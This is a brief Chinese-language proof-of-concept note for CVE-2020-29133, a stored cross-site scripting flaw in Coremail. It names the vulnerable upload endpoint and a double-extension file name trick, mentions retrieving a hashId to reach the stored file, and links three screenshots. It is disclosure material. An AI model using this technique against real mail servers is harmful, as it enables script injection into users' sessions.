# CVE-2020-29133 Coremail 存储型XSS
PoC:
```
coremail/XT5/jsp/upload.jsp 上传 1.jpg.html
```
获取对应的hashId获取到对应的地址
![](media/16097298915254/16097299115036.jpg)
![](media/16097298915254/16097299156243.jpg)
![](media/16097298915254/16097299193319.jpg)